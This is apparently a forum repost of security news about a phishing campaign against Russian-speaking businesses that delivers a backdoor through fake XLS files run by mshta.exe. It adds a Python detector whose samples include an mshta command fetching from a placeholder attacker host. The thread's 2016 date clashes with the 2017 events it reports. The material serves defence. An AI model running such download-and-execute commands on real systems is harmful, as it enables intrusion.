Security News Backdoor-carrying Emails Set Sights on Russian-speaking Businesses

LASER_oneXM (thread author)
Feb 4, 2016
A malicious email campaign against Russian-speaking enterprises is employing a combination of exploits and Windows components to deliver a new backdoor that allows attackers to take over the affected system. The attack abuses various legitimate Windows components to run unauthorized scripts; this is meant to make detection and blocking more challenging, particularly by whitelisting-based solutions.

We’ve observed at least five runs from June 23 to July 27, 2017, each of which sent several malicious emails per target. Affected industries were financial institutions, including banks, and mining firms. Of note is how the attackers diversified their tactic—sending different emails for each run, per target.

The infection chain starts with emails with addresses designed to make it look like they’re from actual sales and billing departments. One sample we found used the subject line, Правила подключения к шлюзу, which translates to “Rules for connecting to the gateway.” Another has the subject line, Оплата госпошлин, which means “Payment of state duties.”

These emails contain an attachment that takes the form of a .DOC file with various file names. Two of the file names we’ve seen used are Инструкция для подключения клиентов.doc (Instructions for connecting clients) and Заявление на оплату услуги .doc (Application for payment of the service).

The exploit code downloads what is supposedly an XLS file from hxxps://wecloud[.]biz/m11[.]xls. This domain, to which all of the URLs used by this attack point, is controlled by the attacker and was registered in early July.

This fake Excel spreadsheet file is embedded with malicious JavaScript. The Excel header will actually be ignored and the file will be treated as an HTML Application file by mshta.exe, the Windows component that handles/opens HTA or HTML files.
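Two defender-side checks follow from the chain described above: the "XLS" is really an HTA with an Excel header bolted on, and mshta.exe ends up running it. The Python below is an added example, not code from the post or from Trend Micro; it sniffs whether a file that claims to be an Office document carries HTML Application markup, and separately flags mshta.exe command lines that point at a URL or at something other than a .hta file. The sample bytes and the sample command lines are constructed for illustration; the OLE2 and ZIP magic numbers are the real ones for legacy and OOXML Office containers, while the URL used in the sample command line is a placeholder rather than the campaign's domain.

```python
import re
from typing import NamedTuple

# Real magic numbers for the two common Office container formats.
OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls (Compound File Binary)
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML .docx/.xlsx

# Markup that belongs in an HTML Application and never in a genuine spreadsheet.
# mshta.exe parses whatever HTML it finds, so the tags may sit behind a binary header.
HTA_MARKUP = re.compile(rb"<\s*(hta:application|script|html)\b", re.IGNORECASE)

# Extensions that legitimately carry HTML; an HTA marker in one of these is expected.
HTML_EXTS = ("hta", "htm", "html")


class Verdict(NamedTuple):
    filename: str
    header_type: str      # "ole2", "zip", "text" or "unknown"
    has_hta_markup: bool
    suspicious: bool
    reason: str


def sniff_header(data: bytes) -> str:
    """Classify a file by its leading bytes, ignoring the extension entirely."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.lstrip()[:1] == b"<":
        return "text"
    return "unknown"


def classify_attachment(filename: str, data: bytes) -> Verdict:
    """Flag a file whose declared type and actual content disagree in a way
    that matters for mshta.exe: Office extension, HTA content underneath."""
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    header = sniff_header(data)
    markup = HTA_MARKUP.search(data) is not None
    if markup and ext not in HTML_EXTS:
        reason = f".{ext} file carries HTML Application markup behind a {header} header"
        return Verdict(filename, header, True, True, reason)
    if ext in ("xls", "doc", "xlsx", "docx") and header not in ("ole2", "zip"):
        reason = f".{ext} file does not start with an Office container header ({header})"
        return Verdict(filename, header, markup, True, reason)
    return Verdict(filename, header, markup, False, "declared type matches content")


def mshta_commandline_suspicious(cmdline: str) -> bool:
    """True when mshta.exe is launched with a URL or with a non-.hta argument.
    Both patterns are how a disguised file like the fake XLS above gets executed."""
    parts = cmdline.split()
    if not parts or not parts[0].strip('"').lower().endswith("mshta.exe"):
        return False
    args = parts[1:]
    if not args:            # bare launch with no target: nothing to judge here
        return False
    target = " ".join(args).strip('"').lower()
    if target.startswith(("http://", "https://")):
        return True
    return not target.endswith(".hta")


# Constructed samples. The fake XLS mimics the structure described in the post:
# an Excel (OLE2) header followed by HTA markup. No real payload is included.
SAMPLE_FAKE_XLS = (
    OLE2_MAGIC + b"\x00" * 56
    + b'<html><head><hta:application id="x"></head>'
    + b'<body><script language="JScript">/* script body omitted */</script></body></html>'
)
SAMPLE_REAL_XLS = OLE2_MAGIC + b"\x00" * 512          # header only, no HTML inside
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\mshta.exe" https://attacker.example.invalid/m11.xls',  # placeholder URL
    '"C:\\Windows\\System32\\mshta.exe" C:\\Users\\user\\AppData\\Local\\Temp\\m11.xls',
    '"C:\\Windows\\System32\\mshta.exe" C:\\Tools\\admin_console.hta',
]

if __name__ == "__main__":
    for name, blob in (("m11.xls", SAMPLE_FAKE_XLS), ("q3_report.xls", SAMPLE_REAL_XLS)):
        print(classify_attachment(name, blob))
    for line in SAMPLE_CMDLINES:
        print(mshta_commandline_suspicious(line), line)
```

`classify_attachment` deliberately keys on tags rather than on the word "javascript", because legitimate spreadsheets can embed that string in cell text; `<hta:application`, `<script` and `<html` have no business in a real workbook. The command-line check is coarse on purpose and is meant as a triage signal from process-creation logs, not as a blocking rule on its own.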